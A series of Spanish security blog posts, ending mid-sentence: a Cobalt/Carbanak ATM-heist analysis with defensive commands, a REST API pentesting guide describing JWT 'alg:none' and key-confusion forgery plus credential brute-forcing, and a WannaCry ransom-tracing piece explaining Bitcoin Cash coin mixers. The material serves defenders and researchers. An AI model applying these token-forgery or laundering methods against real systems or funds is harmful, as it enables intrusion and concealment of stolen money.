Hace algunos días, un actor relevante del grupo de atacantes conocido como Cobalt/Carbanak (o incluso FIN7 para algunos) fue detenido en Alicante. Este grupo ha estado relacionado con distintas campañas contra instituciones bancarias que han provocado unas pérdidas sustanciosas mediante transferencias y retiradas fraudulentas de efectivo en cajeros automáticos. Vamos a ver algunos detalles técnicos del modus operandi de la última oleada, cómo funciona y algunas ideas sobre cómo mitigar el impacto dado el caso. El objetivo del grupo es el acceso a la infraestructura de la entidad financiera para conseguir el compromiso de los cajeros automáticos y retirar fraudulentamente de efectivo. Aunque parezca ciencia ficción, se hacen con el control de la red de cajeros hasta el punto de que pueden hacer que a una hora concreta, comience a soltar todo el efectivo que contiene. Basta con que el "mulero" se encuentre en ese momento frente al cajero para que el golpe se haga realidad. Más que en el análisis de la muestra, nos detendremos en los aspectos más interesantes de las fases del ataque. Objetivo 1: Ataque al inbox del usuario Este grupo emplea la técnica de " spear-phishing" o phishing dirigido. Se trata fundamentalmente de ingeniería social (requiere la interacción de un empleado) para lograr el compromiso de la red corporativa de la organización financiera. Las víctimas (probablemente seleccionados en una fase previa de inteligencia, en las que recolectan nombres y apellidos de trabajadores y los unen con una estructura conocida al dominio del banco) reciben correos electrónicos con adjuntos maliciosos que suplantan a compañías legítimas y autoridades regulatorias. Puede tratarse de correos muy elaborados, con informes de supuestas actualizaciones, alertas, etc. No son enviados de forma masiva en ningún caso, solo a un selecto conjunto de emails pertenecientes normalmente a un mismo dominio. En esta fase, pretenden pasar especialmente bajo el radar. El correo contiene normalmente un enlace web a un documento, esto es, un archivo con extensión .doc (que en realidad habitualmente es un RTF renombrado) alojado en un dominio comprado para la ocasión. Se sabe qué correos en anteriores campañas (e incluso las más recientes) están siendo enviados en esta oleada por un sencillo " mailer" creado en PHP. Habitualmente reconocible porque en su cabecera se añadirá el siguiente mensaje: X-PHP-Originating-Script: 0:alexusMailer_v2.0.php El consejo: mejorar la barrera perimetral típica anti- spam y anti- malware, realizar un sandboxing inteligente del correo, controlar los buzones de personas con privilegios, conocer qué información se filtra afuera, o incluso incluir la revisión controlada de ciertas cuentas para garantizar una mayor protección. Objetivo 2: Ejecución, la red interna Si la víctima ejecuta el fichero con Office vulnerable, comienza la infección. El fichero RTF aprovecha varias vulnerabilidades en Office (especialmente CVE-2017-8570, CVE-2017- 8570…. todas muy recientes) y en su ejecución, extrae a su vez varios tipos de ficheros. EXE, DLL, DOC, BAT y SCT (Visual Basic Script). Cada uno tiene una función: inyección en memoria, descarga de otro payload (SCT), borrado de pruebas (BAT) y el DOC es un documento inocuo con información que solo sirve para "distraer" al usuario. De hecho, se llama "decoy.doc". De lo más curioso son las llamadas SCT, que en realidad esconden una llamada asíncrona para descarga y ejecución del ejecutable que de verdad desencadenará la infección (en los casos en los que no los lleven incrustados los propios documentos). Parte del código de uno de los BAT descargados por el RTF Otro asunto muy curioso es el hecho de utilizar ficheros .BAT para el "control de flujo" de ejecución. El código es bastante autoexplicativo: la intención es que el fichero block.txt haga de " mutex" para que el usuario no lance dos veces el RTF mientras se descargan los payloads, y así no se comporte de forma errática. El caso es que gracias a esto, es posible crear una especie de vacuna sencilla para esta y quizás otras oleadas. Por ejemplo con este código: copy /y nul "%TMP%block.txt" icacls %TMP%block.txt /deny *S-1-1-0:W /T copy /y nul "%TEMP%block.txt" icacls %TEMP%block.txt /deny *S-1-1-0:W /T Es muy simple e inocuo crea un fichero block.txt sin permiso de borrado para nadie. No es lo más elegante e incluso puede ser eludido por el malware, pero como decimos, resulta bastante inocuo. Los RTF son creados con herramientas que se venden en el mercado negro, en las que se define la vulnerabilidad y los ficheros incrustados, y realizan todo el trabajo de composición. Como dato interesante, no crean un RTF que sea consistente con las especificaciones. Los RTF creados que vienen en el correo tienen esta cabecera. "{rt ", "{rt " o "{rt1" Cuando la cabecera debería ser "rtf1". Esto es a causa de esa herramienta de creación de exploits o de inclusión de payloads en RTF. En ella también se usa a veces el dominio test1.ru para estadísticas, pero no tiene función relevante. El consejo: En esta fase, obviamente lo más interesante es disponer de un sistema completamente actualizado (en especial el Office) y unos usuarios correctamente entrenados. Medidas adicionales de seguridad en profundidad (bastionado de Windows específico, detector de malware, EDR, etc.) también son de ayuda. Filtrado web y una buena política de consumo de IOCs para también usar de forma inteligente los datos que ya se puedan llegar a conocer. Código ejemplo real de los SCT que puede a llegar a extraer el RTF. En él se observa la descarga de un ejecutable Objetivo 3: Control de servidores interesantes Los "implantes" se inyectan en el sistema para poder ser controlados de forma remota a través de una llamada a casa. En estos casos, los dominios y comandos utilizados corresponden a herramientas tipo RAT. Los IDS, filtros de proxies, etc. deberían realizar su trabajo. En estos casos concretos, una vez tienen el control de un sistema cualquiera en la red bancaria interna, los atacantes se adaptan en lo que pueden a su entorno, y su actuación depende de las facilidades que les brinden. Se realiza un (obvio) movimiento lateral por la red buscando algún servidor de control de cajeros automáticos. Para conseguirlo se usarán movimientos laterales estándar ( mimikatz, pass the hash, elevación de privilegios en directorio activo...) buscando conexiones hacia estos servidores (por ejemplo, Terminal Server) que les interesan. También, es posible que creen usuarios en varias máquinas para elevar privilegios o pasar desapercibidos de forma más cómoda. Esta fase puede durar semanas. Una vez localizado el servidor que puede llegar a permitir el control de cajeros, se implantará el " beacon", en forma de servicio, para poder ser controlado por el atacante. Se trata de una especie de meterpreter para control remoto, que de nuevo, permite el acceso del atacante y realizará, por tanto, conexiones con el exterior que deberían ser detectadas a través de logs, dominios, etc. En realidad, está basado en CobaltStrike, una herramienta comercial para crear este tipo de herramientas de ataque y control remoto. De hecho, hace poco ha aparecido una nueva versión. El consejo: Una red bien vigilada y segmentada. Correlación adecuada de eventos de seguridad y sobre todo, control de privilegios. Conclusiones Métodos tradicionales mezclados con sistemas más modernos para conseguir control de alguna máquina interna, y de ahí, a manejar un cajero automático. No es ciencia ficción. Como tampoco lo es la posibilidad de protegerse adecuadamente. Como hemos visto (si no en un punto podría ser en otro) existen numerosos métodos con los que combatir este tipo de amenazas, por muy sofisticadas que parezcan, siempre y cuando se entiende la amenaza y se maneja la información adecuada en cada fase del ataque. Nada extraordinariamente nuevo, realmente, pero sí un grave problema a tener en cuenta. Sergio de los Santos Equipo de Innovación y Laboratorio ssantos@11paths.com @ssantosv
16 de abril de 2018
Conectándonos al mundo (Parte 2)
La primera pregunta que nos surgiría sería: ¿Realizar un penetration test a nuestra API Rest es lo mismo que hacer un penetration test a nuestra aplicación web? Cuando hablamos de un penetration test o prueba de seguridad a la aplicación web se entiende que este tipo de pruebas a nuestra API Rest estarán incluidas en el alcance de la misma. Pero, cuando nos adentramos en este mundo de la seguridad en las API nos damos cuenta de que la mayoría de las aplicaciones que suele utilizar un pentester dentro del penetration test, no cubre todo el espectro de las vulnerabilidades que podría tener un API Rest en si mismo. Es por ello, que, muy probablemente, en algunos puntos, tendrán que realizar pruebas manuales y con el tiempo, generarán sus propios scripts. Si tratamos de identificar una metodología de testing, podríamos reutilizar cualquiera que deseemos. Pero, si estamos comenzando en este camino, también podemos definir un camino propio para realizar los test a las API Rest. El primer paso dentro de nuestras pruebas de seguridad sería identificar la superficie de ataque, es decir, los endpoints del API Rest. Como vimos en nuestro post anterior, una de las formas de conseguir información es por medio de la documentación. Otra de las maneras es realizando alguna llamada a una de las funciones principales de la API para ver qué tipo de información devuelve. Cuando comenzamos a realizar diferentes request a posibles endpoints que vamos infiriendo, nos puede brindar información sobre cómo realizar el request correcto. El siguiente request está realizado con la herramienta Postman, una de las más utilizadas para interactuar con las API e interpretar los response en diferentes formatos. Captura de la herramienta PostMan Podríamos incluso realizar un brute force por medio de un diccionario con lo que podrían ser los endpoint más comunes, como por ejemplo: /user /users/ /v1 /v2 /v1/users auth login groups Algo importante que quiero añadir en este punto: es bueno conocer la existencia de los frameworks. Muchos desarrollos de APIs hoy en día están basados en algún tipo de framework que permite la generación más rápida del componente de software. El segundo paso será comprender cómo son los request y los response que se van generando, siempre y cuando utilicen JSON o XML, que suelen ser los más comunes. En este caso, podemos utilizar un proxy local como ZAP y Burp y de esta manera observar la información de respuesta en base a nuestro requerimiento. Request analizada con Burp Response analizada con Burp Es importante observar el formato de respuesta del JSON para comprender la estructura de la misma, o mejor dicho, cómo se están almacenando los datos. Esto también nos permitirá entender cómo se relacionan entre sí, y nos va a dar una idea muy clara de cómo podrían ser las sentencias de extracción de datos en el backend. Debemos de tener en cuenta que el backend podría ser una base de datos relacional, o una NOSQL, o cualquier tipo de estructuras de almacenamiento. Podemos aprovechar también para verificar en esta instancia cuáles son los métodos permitidos, datos del servidor y los códigos de respuesta. Como sabemos, cada programador decide qué código de respuesta HTTP envía al browser, y si bien algunos códigos de respuesta como HTTP 200, 302, 404 suelen ser los más comunes, el programador puede decidir emplear estos mismos códigos para otro tipo de respuestas e incluso implementar códigos diferentes más detallados. En la siguiente imagen vemos los códigos de respuesta utilizados en esta API Rest: Códigos de respuesta comunes Encabezamos HTTP anormales URL con estructuras repetidas, parecidas. Esto nos podría dar la idea de que cierta parte del URL es un parámetro variable. Por ejemplo request como: http://api.localhost.com/user/123ad/account.php http://api.localhost.com/user/165ff/account.php http://api.localhost.com/user/567mm/account.php Verificar si los ítems a los cuales se realizan los request poseen extensiones. Supongamos que hemos identificado que los diferentes request al servidor son .php, .css, .png, etc, pero en ciertos momentos, algunos request no poseen extensiones. Esto nos podría también dar la idea de que este ítem en particular es un parámetro. Por ejemplo: http://api.localhost.com/price/ListItems Todo este tipo de actividades nos ayudarán a comprender la aplicación y poder pasar a la etapa de fuzzing y ser más efectivo. Para realizar el fuzzing y automatizar el proceso de identificación de vulnerabilidades, podemos utilizar herramientas open source como fuzzapi. Pantalla de FuzziApi para lanzar un scan Informe de resultados de FuzzApi Hasta aquí, en nuestro test trabajamos con identificación y reconocimiento, y con técnicas de fuzzing, pero hay más cosas que analizar, y como sabemos, las API Rest deberán ir validando las comunicaciones para aceptar solamente aquellas que sean autorizadas. En el post anterior, mencionamos que uno de los mecanismos más utilizados es el basic authentication. En este nuestro browser envía las credenciales en el formato: user::password y todo ello lo codifica en base64. Como os imagináis, es muy simple capturar este paquete realizando un sniffing, decodificar los datos y acceder al usuario y contraseña en texto plano. Pero, también hay otras pruebas a los controles de acceso que podemos realizar, como por ejemplo, utilizando la técnica de password guessing, creando nuestro propio script, utilizando el NSE script de NMap http-brute o por medio de alguno de los proxy locales mencionados. También mencionamos antes la autenticación basada en los tokens, como JWT, que de igual manera que en el caso anterior, si capturáramos el tráfico entre el cliente y el servidor y obtenemos un JWToken, nos encontraríamos con que el token está compuesto por 3 partes separadas por un punto (.) Las dos primeras están codificadas en base64, fácil de decodificar, y la tercera es una firma sobre las dos partes anteriores para verificar que ningún dato ha sido modificado. La firma que realiza el servidor contiene un valor secreto. En el caso de que consiguiéramos este valor, podríamos crear cualquier token, ya que bastaría con generar los dos primeros JSON y calcular un hash utilizando el valor secreto que averiguamos. Existen también otros mecanismos para saltar del algoritmo de firma, como por ejemplo, generando el primer JSON, pero con el campo del algoritmo en NONE. El último JSON de la firma lo vamos a dejar vacío ( {"alg":"none"} ), esto automáticamente hará que el JWT sea creado sin firma ni cifrado, tal como se especifica en la RFC 7519, de forma insegura. De esta manera, la aplicación va a decodificar el primer JSON (recuerden que es base64) y va ver que el algoritmo es NONE. A partir de allí nos va a permitir enviar cualquier dato, que será tomado como válido. Supongamos que vamos a enviar la siguiente data: { ''sub'': ''1234567890'', ''name'': ''Fabian Chiera'', ''iat'': 1516239022 } Etnonces el header del JWT debe contener el tipo de algoritmo a utilizar: { ''alq'': ''HS256'' ''typ'': ''JWT'' } Utilizaremos la key: apisecure Por lo cual el JWT correspondiente será el siguiente: Cuando mi JWT posea el header alg:none, el tercer string correspondiente a la firma no será incluido ya que no se verificará la firma, y quedará de la siguiente manera: Vean que los tres strings están separados por un punto (.) Muchas librerías utilizadas dentro de los frameworks validan automáticamente un token que tiene en el header el valor “ none”. Para realizar diferentes pruebas sobre los JWT pueden utilizar el sitio jwt.io Supongamos ahora un caso, en donde la aplicación está utilizando firmas RSA, pero en lugar de recibir eso, recibe un token firmado con HMAC. ¿Qué sucederá? ¿La llave pública será entonces la llave privada del HMAC? Así es, porque en el framework de JWT se ejecutará algo como: sign(tokenPayload, 'HS256', serverRSAPublicKey) La diferencia es que utilizamos como “ secret key” la llave pública del servidor, la cual es pública. Con este tipo de pruebas ofensivas podremos ver si podemos generar un token que pase perfecto el proceso de verificación. Existen muchas pruebas más que se pueden hacer, tal como lo mencionaba nuestro compañero Pablo González cuando hablaba de SAPPO. Conclusiones Como vemos, las API tienen varios aspectos a tener en cuenta. Si deseamos verificar la seguridad de nuestras interfaces, se debe realizar un proceso exhaustivo y debe ser considerado dentro de nuestras pruebas de seguridad de las aplicaciones como un apartado más. Siempre se debe de hacer dentro de un proceso ordenado y metodológico, de esta forma, no nos olvidaremos ningún punto a verificar. La utilización de herramientas automatizadas nos brindará rapidez, tal como el caso que comenté de fuzzAPI, pero igualmente debéis de saber que se van a requerir pruebas manuales en las que es prioridad absoluta comprender cómo funciona el API. Y recuerda, las API Rest no son las únicas formas de interfaces, hay diferentes tipos de API. Para cualquier duda o comentario que tengas o que quieras hacer a nuestros expertos, accede a nuestra comunidad y dejad vuestras preguntas. Fabián Chiera Chief Security Ambassador en Panamá fabian.chiera@global.11paths.com @fabianchiera
12 de abril de 2018
Acelerando la ciberseguridad europea entre el Reino Unido y Telefónica (Wayra) - Parte 1 de 2
El GCHQ (Government Communications Headquarters) es relativamente poco conocido fuera del Reino Unido. Esta organización gubernamental casi centenaria (cumplirá 100 años el próximo año), se fundó como la escuela de códigos y cifrado del gobierno (Government Code & Cypher School) en 1919 y no fue hasta 1946 que cambió su nombre al actual. La labor del GCHQ es mantener la seguridad de Gran Bretaña a través del aseguramiento de la información ( information assurance) y de la inteligencia de señales (SIGINT). El GCHQ se fundó tras la primera guerra mundial y tuvo un papel importante durante la segunda guerra mundial desde su famoso centro de Bletchley Park, donde se trabajaba en la ruptura de los códigos Enigma alemanes y también durante la guerra fría. Bletchley Park ©GCHQ El centro cuenta en la actualidad con dos componentes principales, la Organización de Señales Compuestas (CSO), que es responsable de la recopilación de información, y el Centro Nacional de Ciberseguridad ( NCSC), que es responsable de asegurar las comunicaciones propias del Reino Unido. El edificio principal del GCHQ es una original construcción que se conoce como ‘El Donut’ y está ubicado a las afueras de la ciudad de Cheltenham (Reino Unido) desde donde realizan gran parte de su actividad colaborando con sus socios, el Servicio Secreto de Inteligencia (MI6) y el MI5. El Donut, cuartel general del GCHQ El Centro Nacional de Ciberseguridad (NCSC) se creó para ayudar a que el Reino Unido fuera el lugar más seguro para vivir y hacer negocios online protegiendo los servicios críticos ante ciberataques, gestionando incidentes importantes y mejorando la seguridad subyacente de Internet en el Reino Unido a través de mejoras tecnológicas y asesoramiento a ciudadanos y organizaciones. El GCHQ Cyber Accelerator es una colaboración entre el Departamento Gubernamental del Reino Unido para Digital, Cultura, Medios y Deportes (DCMS), el Centro Nacional de Seguridad Cibernética (NCSC) y Wayra UK, parte de Telefónica Open Future, como parte del programa nacional de ciberseguridad del gobierno valorado en £1.9bn, que impulsa la innovación en el sector de la ciberseguridad y ayuda a mantener a las empresas y consumidores británicos a salvo de ataques y amenazas online. El programa, que ya está en su segunda convocatoria, ha recibido en su última convocatoria más de 100 solicitudes de start ups especializadas en ciberseguridad entre las cuales se han seleccionado 9 ( RazorSecure, Warden, Intruder, TrustElevate, Secure Code Warrior, Cybershield, Ioetec, Elliptic y ExactTrack) que están siendo aceleradas durante 9 meses para permitirles ampliar sus capacidades, mejorar sus ideas y diseñar productos de vanguardia. Un grupo de mentores de GCHQ y el grupo Telefónica, incluidos de O2 y ElevenPaths, brindan su apoyo a estas nuevas empresas que también reciben una subvención financiera y acceso a un espacio de trabajo en la ciudad de Cheltenham. En la próxima entrega explicaremos en detalle las start ups seleccionadas y su tecnología para entender como aplican la innovación para superar las amenazas actuales y emergentes. Rames Sarwat Director de Alianzas Estrategicas y Partnerships ElevenPaths rames.sarwatshaker@telefonica.com @ramessarwat
5 de abril de 2018
#CyberSecurityPulse: Dime tus redes sociales y serás bienvenido en Estados Unidos (o no)
El Departamento de Estado de los EE.UU. quiere pedir a los solicitantes de visa que proporcionen detalles sobre las redes sociales que han utilizado durante los últimos cinco años, así como números de teléfono, direcciones de correo electrónico y viajes internacionales durante este período. El plan, si es aprobado por la Oficina de Administración y Presupuesto, ampliará el régimen de investigación de antecedentes que se aplica a aquellos que han sido marcados para un escrutinio adicional de inmigración, a todos los solicitantes de visas de inmigrante y a los solicitantes de visas de no inmigrante, como los viajeros de negocios y los turistas. Este tipo de medidas no son nuevas. A finales de 2016, se aprobó una nueva solicitud de información sobre redes sociales durante la solicitud del ESTA (Sistema Electrónico para Autorización de Viaje). La norma, aprobada por la US Customs and Border Protection, solicitaba (aunque todavía de forma opcional) que se indicaran los nombres de usuarios y cuentas de Facebook, Instagram, Google+, LinkedIn y Youtube. De acuerdo con el DHS, la investigación a través de redes sociales añadiría un nuevo nivel de seguridad ya que se estaría tratando información adicional a la ya disponible sobre fuentes oficiales. «La recopilación de datos a través de redes sociales mejorará el proceso de investigación existente y proporcionará una mayor claridad y visibilidad sobre posibles actividades y conexiones que los analistas pueden utilizar para analizar mejor los casos», decía la propuesta inicial. Actualmente, nadie cuestiona el impacto que tienen las redes sociales tanto en la esfera pública como privada del ser humano. Utilizadas en la actualidad como nuevo espacio de comunicación y lugar en el que sus usuarios expresan sus gustos u opiniones tampoco es nuevo que estas son fuentes muy valiosas para determinadas agencias estatales de cara a la obtención de información. Más información en FederalRegister.gov Noticias destacadas El centro de antidoping del Reino Unido confirma haber sido objetivo de un ciberataque Ukad, el centro de antidoping de UK, posee datos de pruebas médicas sobre historiales médicos de miles de atletas, incluidos futbolistas de la Premier League y olímpicos. La pasada semana se hacía público que había sufrido un ataque pero que no se había comprometido ningún sistema ni se había perdido ningún dato, y añadían: "Estamos satisfechos de tener niveles adecuados de ciberseguridad". Ukad no ha dicho si sabe quién estuvo detrás del ataque. "Tomamos las medidas necesarias para investigar y resolver la situación", dijo un comunicado del organismo. Bien es cierto que en el pasado el grupo Fancy Bears, con sede en Rusia, robó previamente los datos médicos de atletas de la Agencia Mundial Antidopaje. Más información en BBC Protegiendo las webs de inscripción electoral de posibles intrusiones El recién establecido Centro de Análisis e Intercambio de Información sobre Infraestructura Electoral (EI-ISAC, por sus siglas en inglés) del Centro para la Seguridad de Internet planea desplegar sensores de detección de intrusiones en los sitios web de registro de votantes de los 50 estados para las elecciones de mitad de 2018. El proyecto de los sensores se llamada Albert, y el CIS los ha estado utilizando a nivel estatal y local desde 2010, según el Vicepresidente de Operaciones del CIS, Brian Calkin. Los sensores Albert, de código abierto, proporcionan alertas automatizadas sobre amenazas de red tanto tradicionales como avanzadas. Más información en GNC Noticias del resto de la semana Nueva familia de malware, denominada GoScanSSH, que compromete los servidores SSH Los investigadores del Talos Intelligence Group de Cisco han identificado una nueva familia de malware, denominada GoScanSSH, destinada a comprometer servidores SSH. Sin embargo, los investigadores de Talos notaron una serie de atributos inusuales en lo que respecta a GoScanSSH. Lo más sorprendente es que se escribió utilizando el lenguaje de programación Go. Es relativamente raro ver malware escrito en este lenguaje. En este caso particular, también se ha observado que el atacante creó binarios de malware únicos para cada host infectado. Más información en Talos El parche de Meltdown de Microsoft hizo que los PC con Windows 7 fueran más inseguros Poco después de que se publicara Spectre y Meltdown, los proveedores de software, incluyendo Microsoft, sacaron los parches correspondientes. Sin embargo, un investigador de seguridad sueco, Ulf Frisk, descubrió que las correcciones de seguridad de Microsoft en los PCs con Windows 7 para Meltdown ahora permitirían a los atacantes leer la misma memoria del kernel a una velocidad de Gbps, lo que empeora aún más el problema en los PCs con Windows 7 y Server 2008 R2 boxes. Más información en The Register El 23% de proveedores de VPN filtran la dirección IP El investigador de seguridad Paolo Stagno, también conocido como VoidSec, ha descubierto que el 23% (16 de 70) de los proveedores de VPN filtran la dirección IP de los usuarios usando WebRTC. WebRTC es un proyecto abierto y gratuito que ofrece a los navegadores y aplicaciones móviles capacidades de comunicación en tiempo real (RTC) a través de APIs. El listado de las VPN puedes consultarlo en su blog. Más información en VoidSec Otras noticias La Asamblea de Irlanda del Norte advierte sobre brecha del correo electrónico Más información en SC Magazine Airbnb China compartirá información sobre hosts con el gobierno Más información en Security Affairs Los problemas de Apple macOS revelan contraseñas para volúmenes cifrados APFS en texto plano Más información en Security Affairs ¡Regístrate a la newsletter!
3 de abril de 2018
Los autores de Wannacry también quieren sus Bitcoin Cash
El 12 de mayo de 2017 fue un día que para muchos de nosotros no se nos olvidará fácilmente. WannaCry fue uno de los incidentes con mayor impacto en la opinión pública. Aprovechando la ya famosa vulnerabilidad EternalBlue, el programa malicioso consiguíó cifrar los archivos de miles de equipos pidiendo a cambio un rescate de 300 dólares en bitcoins. La pregunta es, ¿qué fue de estos rescates pagados por las víctimas? El saldo de las direcciones Las tres direcciones de Bitcoin identificadas consiguieron recaudar una cantidad superior a los 51 bitcoins (consultables aquí, aquí y aquí). A fecha de hoy, más de medio millón de dólares al cambio. Sin embargo, el diseño del sistema de cobro de los rescates era mejorable. La presentación de la misma dirección a diferentes víctimas complicaba a los atacantes discernir qué víctima había realizado el pago del dinero. Teniendo en cuenta que las transacciones de Bitcoin quedan registradas en la cadena de bloques de Bitcoin, las víctimas podían llegar a suplantar a otras víctimas que sí que habían pagado atribuyéndose una transacción en concreto. En el caso de Bitcoin, la recomendación para quienes administran plataformas en las que se puede pagar por bienes o servicios en bitcoins es generar una dirección de pago única para cada cliente que quiere realizar una compra. De esta manera, es muy cómodo para el comercio verificar si un cliente ha realizado ya el pago en la cadena de bloques. Estas recomendaciones son también aplicables para el caso de Wannacry: a pesar de ser una extorsión, el modelo ideal habría pasado por generar una dirección diferente para cada usuario, lo que habría permitido al atacante contar con una sencilla tabla en la que asociar cada dirección de cobro a una clave de descifrado diferente. Además, esta operación habría tenido otro efecto colateral positivo para el atacante: los investigadores no habrían podido generar más que un subconjunto reducido de direcciones de cobro (una por cada detonación de la muestra) y la tarea de dimensionar el número total de infecciones sería mucho más compleja. Las opciones para conseguirlo habrían pasado por realizar un seguimiento de algunas direcciones conocidas y de tratar de analizar, una vez se empezara a observar el movimiento de esas cuentas, si terminaban por converger en algún punto. El motivo de por qué no se aplicó salió a la luz poco después: una condición de carrera en el proceso de generación de direcciones únicas para cada víctima que impedía que funcionara bien y que terminaba por elegir una de las ya famosas tres direcciones. Los movimientos de Wannacry Apenas unos días después de que se cerraran las ediciones de 2017 de Blackhat USA y Defcon, el 3 de agosto se produjeron los primeros movimientos desde las direcciones de Bitcoin más monitorizadas: seis operaciones diferentes registradas en la blockchain de Bitcoin en un período de apenas unos minutos (concretamente, a las 03:06, 03:07, 03:13, 03:14, 03:14 y 03:25). Comenzaba así el proceso de persecución de estas direcciones que pronto empezarían a mezclarse en una sucesión de operaciones. Figura 1. Primeros movimientos de Wannacry. Partiendo de la base de que las tres direcciones, para efectuar una operación, el autor o autores del ataque tuvo que firmar estas operaciones con las claves privadas correspondientes a cada dirección y notificarlas a algún nodo de la cadena de bloques para que estas fueran añadidas. A partir de ahí, el propio autor podría generar una lista de incontables direcciones bajo su control entre las que realizar estas operaciones para confundir a los investigadores. Sin embargo, si utilizamos herramientas como Blockseer podremos darnos cuenta de que en apenas cinco saltos, el dinero termina asociado a un mercado, hitbtc.com, que opera como exchange de criptodivisas desde el año 2013. Desde Hitbtc se pueden intercambiar estos Bitcoins por muchas otras divisas como Ethereum, Etherum Classic, Litecoin, Lisk… u otras que han sido concebidas para proteger el anonimato de quien las usa, como Monero, Dash o Zcash. Figura 2. Visualización de movimientos en Blockseer. En algunas de estas plataformas, el proceso de registro general es trivial y no requiere de la facilitación de información adicional salvo que se quiera proceder a la compra y venta con divisas convencionales como explican en su propia guía de usuario. En cualquier caso, para muchos investigadores, este sería un buen punto de partida porque esta plataforma sí que contaría con información de las operaciones en las que se vio implicada una cuenta muy próximas a los autores aún a sabiendas de que los implicados podrían no ser estos. No solo Bitcoins: las consecuencias de los forks Como se ha visto anteriormente, las transacciones de Bitcoins se realizaron el 3 de agosto. Sin embargo, unos días antes, tuvo lugar un evento importante para el ecosistema de Bitcoin: el hard fork de Bitcoin Cash. Con motivo del desmesurado incremento de las comisiones por transacción (consecuencia del incremento de la popularidad del Bitcoin y de la limitación del tamaño por bloque de 1 MB), una parte de la comunidad planteó la necesidad de aumentar la oferta de espacio disponible para registrar operaciones cada 10 minutos, es decir, incrementar el tamaño máximo de cada bloque de Bitcoin. Figura 3. Dashboard del exchange HitBTC. Para materializar esa propuesta, los impulsores de Bitcoin Cash plantearon la posibilidad de que los mineros de la red pasaran a aceptar a partir del 1 de agosto bloques con un tamaño máximo de 8 MB con la esperanza de que el aumento de oferta de espacio provocara una reducción del precio que estaban pagando los usuarios por incluir sus transacciones en el bloque. A más oferta de espacio para una misma demanda de espacio en bloque, menos comisiones. Figura 4. Tamaño medio por bloque. Sin embargo, la propuesta traía consigo varias cuestiones que preocupaban a muchos. Por un lado, mientras que los bloques añadidos en un día con el protocolo convencional podrían incrementar en unos 144 MB diarios (a razón de 6 MB por hora) la cada vez más pesada blockchain de Bitcoin, aumentar el tamaño a 8 MB por bloque (48 MB a la hora) podría provocar un incremento diario de 1152 MB diarios. Estas y otras cuestiones de índole ideológico dieron lugar a que la propuesta no fuera aceptada por toda la red, sino solo por una pequeña parte de ella con lo que se pasó a tener dos cadenas de bloques diferentes con una base común: la de Bitcoin convencional que operaba bajo las reglas antiguas de 1 MB por bloque y la de Bitcoin Cash, que permitía a los usuarios gastar sus bitcoins incluyéndolos en bloques de hasta 8 MB. Por lo tanto, quienes tuvieran bitcoins en su cuenta a fecha de 1 de agosto (como ocurría con los autores de Wannacry), podrían gastarlos en dos blockchains diferentes bajo reglas diferentes. A día de hoy, el valor de un Bitcoin y el de un Bitcoin Cash es muy diferente (8100 dólares por unidad de Bitcoin y 912 por unidad de Bitcoin Cash), pero la cantidad en esta criptodivisa sigue siendo relevante. Figura 5. Forks de la cadena de bloques de Bitcoin. Entonces, ¿qué pasó con los Bitcoin Cash de Wannacry? No está claro si por desconocimiento o por falta de interés, pero lo cierto es que los Bitcoin Cash asociados a las cuentas de Wannacry permanecieron en ellas hasta varios meses después, el siete de noviembre de 2017. En esa fecha, los autores realizaron una única transacción en la que juntaron todo el saldo en Bitcoin Cash de las tres direcciones en una única dirección, concretamente en 122TBuG4jWjsfSABdNu4zNrBaREEk2a8od, a priori para simplificar la gestión. Borrando el rastro de las operaciones Tras los movimientos de agosto, algunas plataformas de intercambio como ShapeSift y Changelly ya manifestaron que estaban colaborando con las autoridades tras identificar que sus plataformas habían sido utilizadas para intercambiar las criptodivisas por Monero. Pero, ¿qué opciones podrían tener alguien que quisiera difuminar el rastro de las operaciones en cadenas de bloques como Bitcoin o Bitcoin Cash? Para eso existen los conocidos como coin mixers. Se trata de plataformas que, a cambio de una comisión, mezclan de forma automática el saldo proveniente de varias cuentas para dificultar a un observador la procedencia real del dinero. Dado que este tipo de tareas se pueden también programar de forma manual, desde ElevenPaths tenemos constancia de la existencia de diferentes mixers al alcance de cualquiera que ofrecen este tipo de servicios para Bitcoin Cash como coinmix.to o privcoin.io (existen otros como bch-mixer.com o bchblender.com pero fueron creados con posterioridad al primer movimiento de dinero en BitcoinCash). Figura 6. Funcionalidad de un mixer. En el caso de coinmix.to, el usuario debe facilitar una dirección en la que espera recibir el dinero a ocultar así como el número de bloques en que espera recibirlo. Por cómo funciona coinmix.to, se solicita al usuario que envíe la cantidad cuyo rastro quiere desdibujar a una dirección bajo control de la plataforma junto con una pequeña cantidad con la que cubrir los costes de la red y pagar por el servicio en sí mismo. Figura 7. Funcionamiento de coinmix.to. Transcurrido el tiempo estipulado, el solicitante recibirá el saldo en la dirección fijada como parte de una transacción en la que también se verán implicadas otras direcciones vinculadas a la plataforma y, potencialmente, a otros usuarios. Es este proceso el que sirve para difuminar la dirección de origen de las operaciones ya que el saldo recibido en la dirección de destino no proviene de la operación de solicitud de servicio original (dicho saldo, en nuestro caso, se quedó bajo control de la plataforma en la dirección 1NgUGX9F9zU4QtU9svqCd4gyyFvKhGyKBj). Figura 8. Operación de coinmix.to. Sin embargo, hay que tener en cuenta que esta dirección facilitada por coinmix.to ya había recibido 125 operaciones anteriores en el momento de la prueba. Esto es relevante dado que en el caso de que tengamos visibilidad en el futuro de una dirección que opera en algún momento con esta en concreto, podremos saber con certeza que ha utilizado este servicio de mixing. Asimismo, hay que destacar la gran cantidad de inputs que aparecen en el pago que recibimos en nuestra cuenta de destino. Esta operación nos permitiría identificar direcciones que utiliza el servicio para mezclar las transacciones teniendo en cuenta que para utilizar los inputs que figuran en ella el mixer habrá tenido que firmar dichas operaciones con las correspondientes claves privadas. El funcionamiento de privcoin.io es algo diferente. En su caso, ofrece la posibilidad de llevar a cabo esta tarea para varias criptodivisas y no solo para Bitcoin Cash y ofrece la posibilidad de configurar varias direcciones de retorno y distintos porcentajes de forma que se complica bastante el seguimiento de las operaciones dado que no será tan eficaz si se analizan en base al saldo transferido. Figura 9. Plataforma de mixer de Bitcoin Cash. A diferencia de Coinmix, en el caso de privcoin.io las direcciones donde el usuario tiene que enviar el dinero son únicas por cada operación de ocultación. De esta manera un equipo de analistas no podría utilizar la cadena de bloques para monitorizar las direcciones utilizadas entre medias e identificar a posibles usuarios. De hecho, en el caso de esta plataforma, las direcciones implicadas solo son utilizadas dos veces: una para recibir el dinero y otra para transferirlo. Figura 10. Detalles de la transacción de Privcoin. ¿Cuál es el saldo actual de las cuentas de Wannacry? Pese a las operaciones descritas hasta ahora, los movimientos de salida que implican a estas cuentas no son demasiados. En el caso de Bitcoin, por ejemplo, las direcciones han seguido 